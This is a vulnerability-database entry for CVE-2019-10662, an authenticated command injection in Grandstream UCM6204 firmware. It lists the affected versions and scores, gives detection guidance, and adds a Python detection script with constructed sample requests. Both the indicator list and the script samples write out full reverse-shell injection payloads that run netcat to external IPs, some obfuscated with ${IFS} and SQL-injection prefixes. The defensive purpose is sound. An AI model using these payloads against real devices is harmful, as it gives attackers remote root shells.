cbcvebase.
CVE-2019-10662
published 2019-03-30

Priority: P272 (high) · CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available · EPSS: 43.76% (98.6th percentile)
Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig file-backup parameter to the /cgi? URI.

Affected (1 range)

Vendor        Product            Version range   Fixed in
grandstream   ucm6204_firmware   < 1.0.19.20     1.0.19.20

Detection & IOCs (extracted from sources)

path:      /cgi?
path:      /app/asterisk/var/lib/asterisk/scripts/sendMail.py
command:   admin' or 1=1--`;`nc${IFS}192.168.2.107${IFS}1270${IFS}-e${IFS}/bin/sh`;`
command:   /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
filename:  backupUCMConfig
  • Monitor HTTP requests to the /cgi? URI containing shell metacharacters (backticks, semicolons, ${IFS}) in the backupUCMConfig parameter, indicative of CVE-2019-10662 exploitation attempts.
  • Detect SQL injection payloads combined with shell metacharacters in the username field of the Forgot Password / sendPasswordEmail function, particularly patterns matching `' or 1=1--` followed by backtick-enclosed nc/shell commands.
  • Alert on process execution of sendMail.py invoked via popen/shell with attacker-controlled arguments, especially if followed by nc (netcat) spawning a reverse shell as root.
  • Flag Grandstream UCM62xx devices running firmware versions below 1.0.19.20 as vulnerable to authenticated command injection via CVE-2019-10662.
  • The Metasploit module targets the unauthenticated exploitation path (CVE-2020-5722 + command injection) and is scoped to UCM62xx firmware versions before 1.0.19.20; detections should account for both authenticated (CVE-2019-10662, /cgi? endpoint) and unauthenticated (Forgot Password endpoint) attack surfaces.
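The detection notes above describe three signals: shell metacharacters in the backupUCMConfig parameter of a /cgi request, an SQL-injection prefix followed by a backtick-enclosed command in the Forgot Password username, and sendMail.py being launched through a shell with attacker-controlled arguments. The following is an added example (not code from the page's sources or from any vendor) that turns those notes into checks and runs them over constructed sample requests; the sample URIs, bodies and command lines are made up for illustration and the parameter name `username` for the Forgot Password form is an assumption taken from the bullet above.

```python
"""Detection helpers for the CVE-2019-10662 patterns listed above.

Added example; the samples below are constructed, not captured traffic.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters plus the ${IFS} space substitute used by the public payloads.
SHELL_META = re.compile(r"[`;|&]|\$\{IFS\}|\$\(")
# SQL-injection prefix seen in the Forgot Password payloads.
SQLI_PREFIX = re.compile(r"'\s*or\s+1=1\s*--", re.IGNORECASE)
# sendMail.py started through a shell (the popen pattern described above).
SENDMAIL_VIA_SHELL = re.compile(r"/bin/sh\s+-c\s+python\s+\S*sendMail\.py")


def _params(uri, body=""):
    """Split a request into (path, merged query + form-body parameters)."""
    parts = urlsplit(uri)
    merged = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        merged.setdefault(key, []).extend(values)
    return parts.path, merged


def flag_cgi_request(uri, body=""):
    """True when a request to /cgi carries shell metacharacters in backupUCMConfig."""
    path, params = _params(uri, body)
    if path != "/cgi":
        return False
    return any(SHELL_META.search(v) for v in params.get("backupUCMConfig", []))


def flag_forgot_password(username):
    """True for the SQLi prefix followed by a backtick-enclosed command."""
    m = SQLI_PREFIX.search(username)
    return bool(m) and "`" in username[m.end():]


def flag_process(cmdline):
    """True when sendMail.py runs via a shell with a backtick or nc in its arguments."""
    if not SENDMAIL_VIA_SHELL.search(cmdline):
        return False
    return "`" in cmdline or re.search(r"\bnc\b", cmdline) is not None


# Constructed samples (method, URI, form body); none is real captured traffic.
SAMPLES = [
    ("GET", "/cgi?action=backupUCMConfig&backupUCMConfig=/tmp/ucm-backup.tar", ""),
    ("POST", "/cgi",
     "action=backupUCMConfig&backupUCMConfig=x%60nc+10.0.0.3+4444+-e+%2Fbin%2Fsh%60"),
    ("POST", "/cgi",
     "action=sendPasswordEmail&username=admin%27+or+1%3D1--%60%3B%60nc%24%7BIFS%7D"
     "192.168.2.107%24%7BIFS%7D1270%24%7BIFS%7D-e%24%7BIFS%7D%2Fbin%2Fsh%60%3B%60"),
]


def scan(samples=SAMPLES):
    """Return the indices of samples matching either HTTP-layer rule."""
    hits = []
    for i, (_method, uri, body) in enumerate(samples):
        _path, params = _params(uri, body)
        sqli = any(flag_forgot_password(u) for u in params.get("username", []))
        if flag_cgi_request(uri, body) or sqli:
            hits.append(i)
    return hits


if __name__ == "__main__":
    print("flagged samples:", scan())
```

The checks decode the parameters once (as the device's CGI would) before matching, so URL-encoded backticks and `${IFS}` are caught; a benign backup path without metacharacters is not flagged.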

CVSS provenance

nvd   v3.1   8.8   HIGH       CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd   v2.0   9.0   CRITICAL   AV:N/AC:L/Au:S/C:C/I:C/A:C